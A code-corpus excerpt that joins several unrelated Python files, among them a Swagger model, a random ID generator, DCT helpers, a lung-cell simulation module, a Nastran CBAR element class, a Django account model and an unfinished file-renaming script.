"""V1MachineRegisterRequest - a model defined in Swagger""" # noqa: E501
self._bios = None
self._hardware = None
self._ipmi = None
self._partitionid = None
self._rackid = None
self._tags = None
self._uuid = None
self.discriminator = None
self.bios = bios
self.hardware = hardware
self.ipmi = ipmi
self.partitionid = partitionid
self.rackid = rackid
self.tags = tags
self.uuid = uuid
@property
def bios(self):
"""Gets the bios of this V1MachineRegisterRequest. # noqa: E501
bios information of this machine # noqa: E501
:return: The bios of this V1MachineRegisterRequest. # noqa: E501
:rtype: V1MachineBIOS
"""
return self._bios
@bios.setter
def bios(self, bios):
"""Sets the bios of this V1MachineRegisterRequest.
bios information of this machine # noqa: E501
:param bios: The bios of this V1MachineRegisterRequest. # noqa: E501
:type: V1MachineBIOS
"""
if bios is None:
raise ValueError("Invalid value for `bios`, must not be `None`") # noqa: E501
self._bios = bios
@property
def hardware(self):
"""Gets the hardware of this V1MachineRegisterRequest. # noqa: E501
the hardware of this machine # noqa: E501
:return: The hardware of this V1MachineRegisterRequest. # noqa: E501
:rtype: V1MachineHardwareExtended
"""
return self._hardware
@hardware.setter
def hardware(self, hardware):
"""Sets the hardware of this V1MachineRegisterRequest.
the hardware of this machine # noqa: E501
:param hardware: The hardware of this V1MachineRegisterRequest. # noqa: E501
:type: V1MachineHardwareExtended
"""
if hardware is None:
raise ValueError("Invalid value for `hardware`, must not be `None`") # noqa: E501
self._hardware = hardware
@property
def ipmi(self):
"""Gets the ipmi of this V1MachineRegisterRequest. # noqa: E501
the ipmi access infos # noqa: E501
:return: The ipmi of this V1MachineRegisterRequest. # noqa: E501
:rtype: V1MachineIPMI
"""
return self._ipmi
@ipmi.setter
def ipmi(self, ipmi):
"""Sets the ipmi of this V1MachineRegisterRequest.
the ipmi access infos # noqa: E501
:param ipmi: The ipmi of this V1MachineRegisterRequest. # noqa: E501
:type: V1MachineIPMI
"""
if ipmi is None:
raise ValueError("Invalid value for `ipmi`, must not be `None`") # noqa: E501
self._ipmi = ipmi
@property
def partitionid(self):
"""Gets the partitionid of this V1MachineRegisterRequest. # noqa: E501
the partition id to register this machine with # noqa: E501
:return: The partitionid of this V1MachineRegisterRequest. # noqa: E501
:rtype: str
"""
return self._partitionid
@partitionid.setter
def partitionid(self, partitionid):
"""Sets the partitionid of this V1MachineRegisterRequest.
the partition id to register this machine with # noqa: E501
:param partitionid: The partitionid of this V1MachineRegisterRequest. # noqa: E501
:type: str
"""
if partitionid is None:
raise ValueError("Invalid value for `partitionid`, must not be `None`") # noqa: E501
self._partitionid = partitionid
@property
def rackid(self):
"""Gets the rackid of this V1MachineRegisterRequest. # noqa: E501
the rack id where this machine is connected to # noqa: E501
:return: The rackid of this V1MachineRegisterRequest. # noqa: E501
:rtype: str
"""
return self._rackid
@rackid.setter
def rackid(self, rackid):
"""Sets the rackid of this V1MachineRegisterRequest.
the rack id where this machine is connected to # noqa: E501
:param rackid: The rackid of this V1MachineRegisterRequest. # noqa: E501
:type: str
"""
if rackid is None:
raise ValueError("Invalid value for `rackid`, must not be `None`") # noqa: E501
self._rackid = rackid
@property
def tags(self):
"""Gets the tags of this V1MachineRegisterRequest. # noqa: E501
tags for this machine # noqa: E501
:return: The tags of this V1MachineRegisterRequest. # noqa: E501
:rtype: list[str]
"""
return self._tags
@tags.setter
def tags(self, tags):
"""Sets the tags of this V1MachineRegisterRequest.
tags for this machine # noqa: E501
:param tags: The tags of this V1MachineRegisterRequest. # noqa: E501
:type: list[str]
"""
if tags is None:
raise ValueError("Invalid value for `tags`, must not be `None`") # noqa: E501
self._tags = tags
@property
def uuid(self):
"""Gets the uuid of this V1MachineRegisterRequest. # noqa: E501
the product uuid of the machine to register # noqa: E501
:return: The uuid of this V1MachineRegisterRequest. # noqa: E501
:rtype: str
"""
return self._uuid
@uuid.setter
def uuid(self, uuid):
"""Sets the uuid of this V1MachineRegisterRequest.
the product uuid of the machine to register # noqa: E501
:param uuid: The uuid of this V1MachineRegisterRequest. # noqa: E501
:type: str
"""
if uuid is None:
raise ValueError("Invalid value for `uuid`, must not be `None`") # noqa: E501
self._uuid = uuid
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(V1MachineRegisterRequest, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1MachineRegisterRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 1.898438 | 2 |
hrid/hrid.py | scrummyin/human-readable-id | 4 | 12757440 | import random
from .adjectives import ADJECTIVES
from .nouns import NOUNS, ANIMALS, FLOWERS
from .verbs import VERBS
from .adverbs import ADVERBS
DICTIONARY = {
'adjective': ADJECTIVES,
'noun': NOUNS,
'verb': VERBS,
'adverb': ADVERBS,
'number': list(map(str, range(10,99)))
}
class HRID:
def __init__(self, delimeter='-', hridfmt=('adjective', 'noun', 'verb', 'adverb')):
self.delimeter = delimeter
self.phrasefmt = list()
for element in hridfmt:
self.phrasefmt.append(DICTIONARY.get(element, element))
def generate(self):
phrases = list()
for element in self.phrasefmt:
if isinstance(element, (str)):
phrases.append(element)
if isinstance(element, (list)):
phrases.append(random.choice(element))
return self.delimeter.join(phrases)
| 3.25 | 3 |
GeoDA/utils.py | machanic/TangentAttack | 4 | 12757441 | import numpy as np
import os
import torch
import copy
from math import cos, sqrt, pi
def dct(x, y, v, u, n):
# Normalisation
def alpha(a):
if a == 0:
return sqrt(1.0 / n)
else:
return sqrt(2.0 / n)
return alpha(u) * alpha(v) * cos(((2 * x + 1) * (u * pi)) / (2 * n)) * cos(((2 * y + 1) * (v * pi)) / (2 * n))
def generate_2d_dct_basis(root_path, image_height, sub_dim=75):
path = "{}/attacked_images/GeoDA/2d_dct_basis_height_{}_subdim_{}.npy".format(root_path, image_height, sub_dim)
os.makedirs(os.path.dirname(path),exist_ok=True)
if os.path.exists(path):
return np.load(path)
n = image_height # Assume square image, so we don't have different xres and yres
# We can get different frequencies by setting u and v
# Here, we have a max u and v to loop over and display
# Feel free to adjust
maxU = sub_dim
maxV = sub_dim
dct_basis = []
for u in range(0, maxU):
for v in range(0, maxV):
basisImg = np.zeros((n, n))
for y in range(0, n):
for x in range(0, n):
basisImg[y, x] = dct(x, y, v, u, max(n, maxV))
dct_basis.append(basisImg)
dct_basis = np.mat(np.reshape(dct_basis, (maxV*maxU, n*n))).transpose()
np.save(path, dct_basis)
return dct_basis
def clip_image_values(x, minv, maxv):
if not isinstance(minv, torch.Tensor):
return torch.clamp(x,min=minv,max=maxv)
return torch.min(torch.max(x, minv), maxv)
def valid_bounds(img, delta=255):
im = copy.deepcopy(np.asarray(img))
im = im.astype(np.int)
# General valid bounds [0, 255]
valid_lb = np.zeros_like(im)
valid_ub = np.full_like(im, 255)
# Compute the bounds
lb = im - delta
ub = im + delta
# Validate that the bounds are in [0, 255]
lb = np.maximum(valid_lb, np.minimum(lb, im))
ub = np.minimum(valid_ub, np.maximum(ub, im))
# Change types to uint8
lb = lb.astype(np.uint8)
ub = ub.astype(np.uint8)
return lb, ub
def inv_tf(x, mean, std):
for i in range(len(mean)):
x[i] = np.multiply(x[i], std[i], dtype=np.float32)
x[i] = np.add(x[i], mean[i], dtype=np.float32)
x = np.swapaxes(x, 0, 2)
x = np.swapaxes(x, 0, 1)
return x
def inv_tf_pert(r):
pert = np.sum(np.absolute(r), axis=0)
pert[pert != 0] = 1
return pert
def get_label(x):
s = x.split(' ')
label = ''
for l in range(1, len(s)):
label += s[l] + ' '
return label
def nnz_pixels(arr):
return np.count_nonzero(np.sum(np.absolute(arr), axis=0))
| 2.1875 | 2 |
nlisim/modules/pneumocyte.py | jbeezley/simulation-hello-world | 4 | 12757442 | import math
from typing import Any, Dict, Tuple
import attr
from attr import attrib, attrs
import numpy as np
from nlisim.cell import CellData, CellFields, CellList
from nlisim.coordinates import Point, Voxel
from nlisim.grid import RectangularGrid
from nlisim.modules.phagocyte import (
PhagocyteCellData,
PhagocyteModel,
PhagocyteModuleState,
PhagocyteStatus,
)
from nlisim.random import rg
from nlisim.state import State
from nlisim.util import TissueType, activation_function
class PneumocyteCellData(PhagocyteCellData):
PNEUMOCYTE_FIELDS: CellFields = [
('status', np.uint8),
('status_iteration', np.uint),
('tnfa', bool),
]
dtype = np.dtype(
CellData.FIELDS + PhagocyteCellData.PHAGOCYTE_FIELDS + PNEUMOCYTE_FIELDS, align=True
) # type: ignore
@classmethod
def create_cell_tuple(
cls,
**kwargs,
) -> Tuple:
initializer = {
'status': kwargs.get('status', PhagocyteStatus.RESTING),
'status_iteration': kwargs.get('status_iteration', 0),
'tnfa': kwargs.get('tnfa', False),
}
# ensure that these come in the correct order
return PhagocyteCellData.create_cell_tuple(**kwargs) + tuple(
[initializer[key] for key, *_ in PneumocyteCellData.PNEUMOCYTE_FIELDS]
)
@attrs(kw_only=True, frozen=True, repr=False)
class PneumocyteCellList(CellList):
CellDataClass = PneumocyteCellData
def cell_list_factory(self: 'PneumocyteState') -> PneumocyteCellList:
return PneumocyteCellList(grid=self.global_state.grid)
@attrs(kw_only=True)
class PneumocyteState(PhagocyteModuleState):
cells: PneumocyteCellList = attrib(default=attr.Factory(cell_list_factory, takes_self=True))
max_conidia: int # units: conidia
time_to_rest: float # units: hours
iter_to_rest: int # units: steps
time_to_change_state: float # units: hours
iter_to_change_state: int # units: steps
# p_il6_qtty: float # units: mol * cell^-1 * h^-1
# p_il8_qtty: float # units: mol * cell^-1 * h^-1
p_tnf_qtty: float # units: atto-mol * cell^-1 * h^-1
pr_p_int: float # units: probability
pr_p_int_param: float
class Pneumocyte(PhagocyteModel):
name = 'pneumocyte'
StateClass = PneumocyteState
def initialize(self, state: State):
pneumocyte: PneumocyteState = state.pneumocyte
voxel_volume: float = state.voxel_volume
time_step_size: float = self.time_step
lung_tissue: np.ndarray = state.lung_tissue
pneumocyte.max_conidia = self.config.getint('max_conidia') # units: conidia
pneumocyte.time_to_rest = self.config.getint('time_to_rest') # units: hours
pneumocyte.time_to_change_state = self.config.getint('time_to_change_state') # units: hours
pneumocyte.p_tnf_qtty = self.config.getfloat(
'p_tnf_qtty'
) # units: atto-mol * cell^-1 * h^-1
pneumocyte.pr_p_int_param = self.config.getfloat('pr_p_int_param')
# computed values
pneumocyte.iter_to_rest = int(
pneumocyte.time_to_rest * (60 / self.time_step)
) # units: hours * (min/hour) / (min/step) = step
pneumocyte.iter_to_change_state = int(
pneumocyte.time_to_change_state * (60 / self.time_step)
) # units: hours * (min/hour) / (min/step) = step
pneumocyte.pr_p_int = -math.expm1(
-time_step_size / 60 / (voxel_volume * pneumocyte.pr_p_int_param)
) # units: probability
# initialize cells, placing one per epithelial voxel
dz_field: np.ndarray = state.grid.delta(axis=0)
dy_field: np.ndarray = state.grid.delta(axis=1)
dx_field: np.ndarray = state.grid.delta(axis=2)
epithelial_voxels = list(zip(*np.where(lung_tissue == TissueType.EPITHELIUM)))
rg.shuffle(epithelial_voxels)
for vox_z, vox_y, vox_x in epithelial_voxels[: self.config.getint('count')]:
# the x,y,z coordinates are in the centers of the grids
z = state.grid.z[vox_z]
y = state.grid.y[vox_y]
x = state.grid.x[vox_x]
dz = dz_field[vox_z, vox_y, vox_x]
dy = dy_field[vox_z, vox_y, vox_x]
dx = dx_field[vox_z, vox_y, vox_x]
pneumocyte.cells.append(
PneumocyteCellData.create_cell(
point=Point(
x=x + rg.uniform(-dx / 2, dx / 2),
y=y + rg.uniform(-dy / 2, dy / 2),
z=z + rg.uniform(-dz / 2, dz / 2),
)
)
)
return state
def single_step_probabilistic_drift(
self, state: State, cell: PhagocyteCellData, voxel: Voxel
) -> Point:
# pneumocytes do not move
pass
def advance(self, state: State, previous_time: float):
"""Advance the state by a single time step."""
from nlisim.modules.afumigatus import (
AfumigatusCellData,
AfumigatusCellStatus,
AfumigatusState,
)
# from nlisim.modules.il6 import IL6State
# from nlisim.modules.il8 import IL8State
from nlisim.modules.tnfa import TNFaState
pneumocyte: PneumocyteState = state.pneumocyte
afumigatus: AfumigatusState = state.afumigatus
# il6: IL6State = getattr(state, 'il6', None)
# il8: IL8State = getattr(state, 'il8', None)
tnfa: TNFaState = state.tnfa
grid: RectangularGrid = state.grid
voxel_volume: float = state.voxel_volume
for pneumocyte_cell_index in pneumocyte.cells.alive():
pneumocyte_cell = pneumocyte.cells[pneumocyte_cell_index]
pneumocyte_cell_voxel: Voxel = grid.get_voxel(pneumocyte_cell['point'])
# self update
if pneumocyte_cell['status'] == PhagocyteStatus.ACTIVE:
if pneumocyte_cell['status_iteration'] >= pneumocyte.iter_to_rest:
pneumocyte_cell['status_iteration'] = 0
pneumocyte_cell['status'] = PhagocyteStatus.RESTING
pneumocyte_cell['tnfa'] = False
else:
pneumocyte_cell['status_iteration'] += 1
elif pneumocyte_cell['status'] == PhagocyteStatus.ACTIVATING:
if pneumocyte_cell['status_iteration'] >= pneumocyte.iter_to_change_state:
pneumocyte_cell['status_iteration'] = 0
pneumocyte_cell['status'] = PhagocyteStatus.ACTIVE
else:
pneumocyte_cell['status_iteration'] += 1
# ----------- interactions
# interact with fungus
if pneumocyte_cell['status'] not in {
PhagocyteStatus.APOPTOTIC,
PhagocyteStatus.NECROTIC,
PhagocyteStatus.DEAD,
}:
local_aspergillus = afumigatus.cells.get_cells_in_voxel(pneumocyte_cell_voxel)
for aspergillus_index in local_aspergillus:
aspergillus_cell: AfumigatusCellData = afumigatus.cells[aspergillus_index]
# skip resting conidia
if aspergillus_cell['status'] == AfumigatusCellStatus.RESTING_CONIDIA:
continue
if pneumocyte_cell['status'] != PhagocyteStatus.ACTIVE:
if rg.uniform() < pneumocyte.pr_p_int:
pneumocyte_cell['status'] = PhagocyteStatus.ACTIVATING
else:
# TODO: I don't get this, looks like it zeros out the iteration
# when activating
pneumocyte_cell['status_iteration'] = 0
# # secrete IL6
# if il6 is not None and pneumocyte_cell['status'] == PhagocyteStatus.ACTIVE:
# il6.grid[tuple(pneumocyte_cell_voxel)] += pneumocyte.p_il6_qtty
#
# # secrete IL8
# if il8 is not None and pneumocyte_cell['tnfa']:
# il8.grid[tuple(pneumocyte_cell_voxel)] += pneumocyte.p_il8_qtty
# interact with TNFa
if pneumocyte_cell['status'] == PhagocyteStatus.ACTIVE:
if (
activation_function(
x=tnfa.grid[tuple(pneumocyte_cell_voxel)],
k_d=tnfa.k_d,
h=self.time_step / 60, # units: (min/step) / (min/hour)
volume=voxel_volume,
b=1,
)
< rg.uniform()
):
pneumocyte_cell['status_iteration'] = 0
pneumocyte_cell['tnfa'] = True
# secrete TNFa
tnfa.grid[tuple(pneumocyte_cell_voxel)] += pneumocyte.p_tnf_qtty
return state
def summary_stats(self, state: State) -> Dict[str, Any]:
pneumocyte: PneumocyteState = state.pneumocyte
live_pneumocytes = pneumocyte.cells.alive()
max_index = max(map(int, PhagocyteStatus))
status_counts = np.bincount(
np.fromiter(
(
pneumocyte.cells[pneumocyte_cell_index]['status']
for pneumocyte_cell_index in live_pneumocytes
),
dtype=np.uint8,
),
minlength=max_index + 1,
)
tnfa_active = int(
np.sum(
np.fromiter(
(
pneumocyte.cells[pneumocyte_cell_index]['tnfa']
for pneumocyte_cell_index in live_pneumocytes
),
dtype=bool,
)
)
)
return {
'count': len(pneumocyte.cells.alive()),
'inactive': int(status_counts[PhagocyteStatus.INACTIVE]),
'inactivating': int(status_counts[PhagocyteStatus.INACTIVATING]),
'resting': int(status_counts[PhagocyteStatus.RESTING]),
'activating': int(status_counts[PhagocyteStatus.ACTIVATING]),
'active': int(status_counts[PhagocyteStatus.ACTIVE]),
'apoptotic': int(status_counts[PhagocyteStatus.APOPTOTIC]),
'necrotic': int(status_counts[PhagocyteStatus.NECROTIC]),
'interacting': int(status_counts[PhagocyteStatus.INTERACTING]),
'TNFa active': tnfa_active,
}
def visualization_data(self, state: State):
return 'cells', state.pneumocyte.cells
| 2.1875 | 2 |
pyNastran/dev/bdf_vectorized/cards/elements/bar/cbar.py | ACea15/pyNastran | 293 | 12757443 | from numpy import array, arange, zeros, unique, searchsorted, full, nan
from numpy.linalg import norm # type: ignore
from pyNastran.utils.numpy_utils import integer_types
from pyNastran.bdf.field_writer_8 import print_card_8, set_blank_if_default
from pyNastran.bdf.field_writer_16 import print_card_16
from pyNastran.bdf.bdf_interface.assign_type import (
integer, integer_or_blank,
double_or_blank, integer_double_or_blank, string_or_blank)
from pyNastran.bdf.cards.elements.bars import BAROR
from pyNastran.bdf.field_writer_8 import set_string8_blank_if_default
from pyNastran.dev.bdf_vectorized.cards.elements.element import Element
class CBAR(Element):
"""
+-------+-----+-----+-----+-----+-----+-----+-----+------+
| CBAR | EID | PID | GA | GB | X1 | X2 | X3 | OFFT |
+-------+-----+-----+-----+-----+-----+-----+-----+------+
| | PA | PB | W1A | W2A | W3A | W1B | W2B | W3B |
+-------+-----+-----+-----+-----+-----+-----+-----+------+
or
+-------+-----+-----+-----+-----+-----+-----+-----+------+
| CBAR | EID | PID | GA | GB | G0 | | | OFFT |
+-------+-----+-----+-----+-----+-----+-----+-----+------+
| | PA | PB | W1A | W2A | W3A | W1B | W2B | W3B |
+-------+-----+-----+-----+-----+-----+-----+-----+------+
+-------+-------+-----+-------+-------+--------+-------+-------+-------+
| CBAR | 2 | 39 | 7 | 6 | 105 | | | GGG |
+-------+-------+-----+-------+-------+--------+-------+-------+-------+
| | | 513 | 0.0+0 | 0.0+0 | -9. | 0.0+0 | 0.0+0 | -9. |
+-------+-------+-----+-------+-------+--------+-------+-------+-------+
"""
type = 'CBAR'
def __init__(self, model):
"""
Defines the CBAR object.
Parameters
----------
model : BDF
the BDF object
"""
Element.__init__(self, model)
def allocate(self, card_count):
ncards = card_count[self.type]
self.n = ncards
if self.n:
assert isinstance(ncards, int), ncards
float_fmt = self.model.float_fmt
#: Element ID
self.element_id = zeros(ncards, 'int32')
#: Property ID
self.property_id = zeros(ncards, 'int32')
self.node_ids = zeros((ncards, 2), 'int32')
self.is_g0 = zeros(ncards, 'bool')
self.g0 = full(ncards, nan, 'int32')
self.x = full((ncards, 3), nan, float_fmt)
self.offt = full(ncards, nan, '|U3')
self.pin_flags = zeros((ncards, 2), 'int32')
self.wa = zeros((ncards, 3), float_fmt)
self.wb = zeros((ncards, 3), float_fmt)
def add_card(self, card, comment=''):
i = self.i
if 0 and self.model.cbaror.n > 0:
cbaror = self.model.cbaror
pid_default = cbaror.property_id
is_g0_default = cbaror.is_g0
x1_default = cbaror.x[0]
x2_default = cbaror.x[1]
x3_default = cbaror.x[2]
g0_default = cbaror.g0
offt_default = cbaror.offt
else:
pid_default = None
is_g0_default = None
x1_default = 0.0
x2_default = 0.0
x3_default = 0.0
g0_default = None
offt_default = 'GGG'
eid = integer(card, 1, 'element_id')
self.element_id[i] = eid
if pid_default is not None:
self.property_id[i] = integer_or_blank(card, 2, 'property_id', pid_default)
else:
self.property_id[i] = integer_or_blank(card, 2, 'property_id', eid)
self.node_ids[i] = [integer(card, 3, 'GA'),
integer(card, 4, 'GB')]
#---------------------------------------------------------
# x / g0
if g0_default is not None:
field5 = integer_double_or_blank(card, 5, 'g0_x1', g0_default)
else:
field5 = integer_double_or_blank(card, 5, 'g0_x1', x1_default)
if isinstance(field5, integer_types):
self.is_g0[i] = True
self.g0[i] = field5
elif isinstance(field5, float):
self.is_g0[i] = False
x = array([field5,
double_or_blank(card, 6, 'x2', x2_default),
double_or_blank(card, 7, 'x3', x3_default)], dtype='float64')
self.x[i, :] = x
if norm(x) == 0.0:
msg = 'G0 vector defining plane 1 is not defined on CBAR %s.\n' % eid
msg += 'G0 = %s\n' % field5
msg += 'X = %s\n' % x
msg += '%s' % card
raise RuntimeError(msg)
else:
msg = ('field5 on CBAR (G0/X1) is the wrong type...id=%s field5=%s '
'type=%s' % (self.eid, field5, type(field5)))
raise RuntimeError(msg)
#---------------------------------------------------------
# offt
# bit doesn't exist on the CBAR
offt = string_or_blank(card, 8, 'offt', offt_default)
msg = 'invalid offt parameter of CBEAM...offt=%s' % offt
assert offt[0] in ['G', 'B', 'O', 'E'], msg
assert offt[1] in ['G', 'B', 'O', 'E'], msg
assert offt[2] in ['G', 'B', 'O', 'E'], msg
self.offt[i] = offt
self.pin_flags[i, :] = [integer_or_blank(card, 9, 'pa', 0),
integer_or_blank(card, 10, 'pb', 0)]
self.wa[i, :] = [double_or_blank(card, 11, 'w1a', 0.0),
double_or_blank(card, 12, 'w2a', 0.0),
double_or_blank(card, 13, 'w3a', 0.0),]
self.wb[i, :] = [double_or_blank(card, 14, 'w1b', 0.0),
double_or_blank(card, 15, 'w2b', 0.0),
double_or_blank(card, 16, 'w3b', 0.0),]
assert len(card) <= 17, 'len(CBAR card) = %i\ncard=%s' % (len(card), card)
self.i += 1
def build(self):
if self.n:
i = self.element_id.argsort()
self.element_id = self.element_id[i]
self.property_id = self.property_id[i]
self.node_ids = self.node_ids[i, :]
self.is_g0 = self.is_g0[i]
self.g0 = self.g0[i]
self.x = self.x[i, :]
self.offt = self.offt[i]
self.pin_flags = self.pin_flags[i, :]
self.wa = self.wa[i, :]
self.wb = self.wb[i, :]
unique_eids = unique(self.element_id)
if len(unique_eids) != len(self.element_id):
raise RuntimeError('There are duplicate CBAR IDs...')
self._cards = []
else:
self.element_id = array([], dtype='int32')
self.property_id = array([], dtype='int32')
def update(self, maps):
"""
maps = {
'node_id' : nid_map,
'property' : pid_map,
}
"""
if self.n:
eid_map = maps['element']
nid_map = maps['node']
pid_map = maps['property']
for i, (eid, pid, nids) in enumerate(zip(self.element_id, self.property_id,
self.node_ids)):
self.element_id[i] = eid_map[eid]
self.property_id[i] = pid_map[pid]
self.node_ids[i, 0] = nid_map[nids[0]]
self.node_ids[i, 1] = nid_map[nids[1]]
#=========================================================================
def get_mass_by_element_id(self, grid_cid0=None, total=False):
"""
mass = rho * A * L + nsm
"""
if self.n == 0:
return 0.0
return [0.0]
if grid_cid0 is None:
grid_cid0 = self.model.grid.get_position_by_node_index()
p1 = grid_cid0[self.node_ids[:, 0]]
p2 = grid_cid0[self.node_ids[:, 1]]
L = p2 - p1
i = self.model.properties_bar.get_index(self.property_id)
A = self.model.properties_bar.get_Area[i]
material_id = self.model.properties_bar.material_id[i]
rho, E, J = self.model.Materials.get_rho_E_J(material_id)
rho = self.model.Materials.get_rho(self.mid)
E = self.model.Materials.get_E(self.mid)
J = self.model.Materials.get_J(self.mid)
mass = norm(L, axis=1) * A * rho + self.nsm
if total:
return mass.sum()
else:
return mass
#=========================================================================
def write_card(self, bdf_file, size=8, element_ids=None):
if self.n:
if element_ids is None:
i = arange(self.n)
else:
i = searchsorted(self.element_id, self.element_id)
for (eid, pid, n, is_g0, g0, x, offt, pin, wa, wb) in zip(
self.element_id[i], self.property_id[i], self.node_ids[i],
self.is_g0[i], self.g0[i], self.x[i],
self.offt[i],
self.pin_flags[i], self.wa[i], self.wb[i]):
pa = set_blank_if_default(pin[0], 0)
pb = set_blank_if_default(pin[1], 0)
w1a = set_blank_if_default(wa[0], 0.0)
w2a = set_blank_if_default(wa[1], 0.0)
w3a = set_blank_if_default(wa[2], 0.0)
w1b = set_blank_if_default(wb[0], 0.0)
w2b = set_blank_if_default(wb[1], 0.0)
w3b = set_blank_if_default(wb[2], 0.0)
x1 = g0 if is_g0 else x[0]
x2 = 0 if is_g0 else x[1]
x3 = 0 if is_g0 else x[2]
offt = set_string8_blank_if_default(offt, 'GGG')
card = ['CBAR', eid, pid, n[0], n[1], x1, x2, x3, offt,
pa, pb, w1a, w2a, w3a, w1b, w2b, w3b]
if size == 8:
bdf_file.write(print_card_8(card))
else:
bdf_file.write(print_card_16(card))
def slice_by_index(self, i):
i = self._validate_slice(i)
obj = CBAR(self.model)
obj.n = len(i)
#obj._cards = self._cards[i]
#obj._comments = obj._comments[i]
#obj.comments = obj.comments[i]
obj.element_id = self.element_id[i]
obj.property_id = self.property_id[i]
obj.node_ids = self.node_ids[i, :]
obj.is_g0 = self.is_g0[i]
obj.g0 = self.g0[i]
obj.x = self.x[i, :]
obj.offt = self.offt[i]
obj.pin_flags = self.pin_flags[i]
obj.wa = self.wa[i]
obj.wb = self.wb[i]
return obj
#def get_stiffness_matrix(self, model, node_ids, index0s, fnorm=1.0):
#return K, dofs, n_ijv
| 2.203125 | 2 |
maya/2019/scripts/zen/sortBy.py | callumMccready/callummccready.github.io | 0 | 12757444 | from zen.isIterable import isIterable
def sortBy(*args,**keywords):
sorted=[]
sel=[]
if len(args)==1:
if isIterable(args[0]) and len(args[0])>1:
sorted=list(args[0][-1])
sel=list(args[0][0])
inputType=type(args[0][0]).__name__
else:
return
elif len(args)>1:
sorted=list(args[-1])
sel=list(args[0])
inputType=type(args[0]).__name__
l=sorted[:]
for s in l:
if s not in sel:
sorted.remove(s)
unsorted=sel[0:0]
for s in sel:
if s not in sorted:
unsorted=unsorted+[s]
if inputType=='str' or inputType=='unicode':
unsorted=''.join(unsorted)
sorted=''.join(sorted)
elif inputType=='dict':
sorted=list(sorted)
unsorted=list(unsorted)
else:
exec('sorted='+inputType+'(sorted)')
exec('unsorted='+inputType+'(unsorted)')
return(sorted+unsorted)
| 3.328125 | 3 |
mtq/tests/__main__.py | Binstar/mtq | 2 | 12757445 | <filename>mtq/tests/__main__.py
'''
Created on Aug 5, 2013
@author: sean
'''
import unittest
from os.path import dirname
def main():
import coverage
cov = coverage.coverage()
cov.start()
loader = unittest.loader.TestLoader()
tests = loader.discover(dirname(__file__))
runner = unittest.TextTestRunner()
runner.run(tests)
cov.stop()
cov.report(omit=['**/site-packages/**', '**/tests/**'])
cov.html_report(omit=['**/site-packages/**', '**/tests/**'])
if __name__ == '__main__':
main()
| 2.203125 | 2 |
django_server/accounts/models.py | forkcs/mycode | 0 | 12757446 | from django.contrib.auth import get_user_model
from django.db import models
User = get_user_model()
ACCOUNT_TYPES = (
(1, 'Admin'),
(2, 'Teacher'),
(3, 'Student')
)
class Account(models.Model):
class Meta:
verbose_name = 'Account'
verbose_name_plural = 'Accounts'
user = models.OneToOneField(to=User, on_delete=models.CASCADE)
account_type = models.PositiveSmallIntegerField(choices=ACCOUNT_TYPES)
first_name = models.CharField(max_length=50)
last_name = models.CharField(max_length=50)
middle_name = models.CharField(max_length=50)
birth_date = models.DateField()
school_name = models.CharField(max_length=100)
def __str__(self):
return self.first_name + self.last_name
| 2.59375 | 3 |
src/main.py | N-z0/pyRenamer | 0 | 12757447 | #!/usr/bin/env python3
#coding: utf-8
### 1st line allows to execute this script by typing only its name in terminal, with no need to precede it with the python command
### 2nd line declaring source code charset should be not necessary but for exemple pydoc request it
__doc__ = "This is the program centerpiece,but need to be imported by other modules to be used"#information describing the purpose of this module
__status__ = "Development"#should be one of 'Prototype' 'Development' 'Production' 'Deprecated' 'Release'
__version__ = "3.0.0"# version number,date or about last modification made compared to the previous version
__license__ = "public domain"# ref to an official existing License
__date__ = "2017"#started creation date / year month day
__author__ = "N-zo <EMAIL>"#the creator origin of this prog,
__maintainer__ = "Nzo"#person who curently makes improvements, replacing the author
__credits__ = []#passed mainteners and any other helpers
__contact__ = "<EMAIL>"# current contact adress for more info about this file
### import the required modules
from commonz.convert import text
CONTROL_CHAR= '\x07\x0b\x09\x0a\x0d\x7f\x08\x1b\x0c\x1b'
SYSTEM_CHAR="/\:*<>|.~"
QUOTE_CHAR="'"
DOUBLE_QUOTE_CHAR='"'
SUBSTITUTE_SPACE='_'
SUBSTITUTE_DOT='-'
### Misc
#import random
#import string # chain of char manipulation
#import collections # provide alternatives specialized datatypes (dict, list, set, and tupl) ex: deque>list-like container with fast appends and pops on either end
#from collections import deque # storage de queue de données
#import urllib # open a URL the same way you open a local file
### asynchron
#import asyncio #provides the basic infrastructure for writing asynchronous programs.
#import threading # constructs higher-level threading interfaces
#import queue #when information must be exchanged safely between multiple threads.
#import signal #Set handlers for asynchronous events
#import select # is low level module,Users are encouraged to use the selectors module instead
#import selectors # built upon the select module,allows high-level I/O multiplexing
#import asyncio# built upon selectors
#import multiprocessing
class Main():
"""main software application as object"""
def __init__(self):
"""initialization of the application"""
pass
def get_correct_name(self,old_name,old_ext_names,cfg,sp_char):
#print(base_name,ext_names,max_ext)
uncode=cfg["uncode"]
ascii_only=cfg["ascii"]
spaces=cfg["spaces"]
case=cfg["case"]
strip_list=cfg["strip"]
merge_list=cfg["merge"]
eraze_list=cfg["eraze"]
convert_tabl=cfg["conv"]
max_dots=cfg["ext"]
convert_ext_tabl=cfg["conv_ext"]
names_list= self.undots(old_name,old_ext_names,max_dots)
#print(names_list)
names_qantum=len(names_list)
for name_index in range(names_qantum) :
name=None
new_name=names_list[name_index]
if uncode :
new_name=self.uncode(new_name)
while not new_name==name :
name=new_name
new_name=self.normalize(new_name,sp_char)
if ascii_only :
new_name=self.ascii(new_name)
if not spaces :
new_name=self.unspaces(new_name)
if case!=0 :
new_name=self.set_case(new_name,case)
if strip_list!=() :
new_name=self.strip(new_name,strip_list)
if merge_list!=() :
new_name=self.merge(new_name,merge_list)
if eraze_list!=() :
new_name=self.eraze(new_name,eraze_list)
if convert_tabl!={} :
new_name=self.convert(new_name,convert_tabl)
names_list[name_index]=new_name
if convert_ext_tabl and names_qantum>1 :
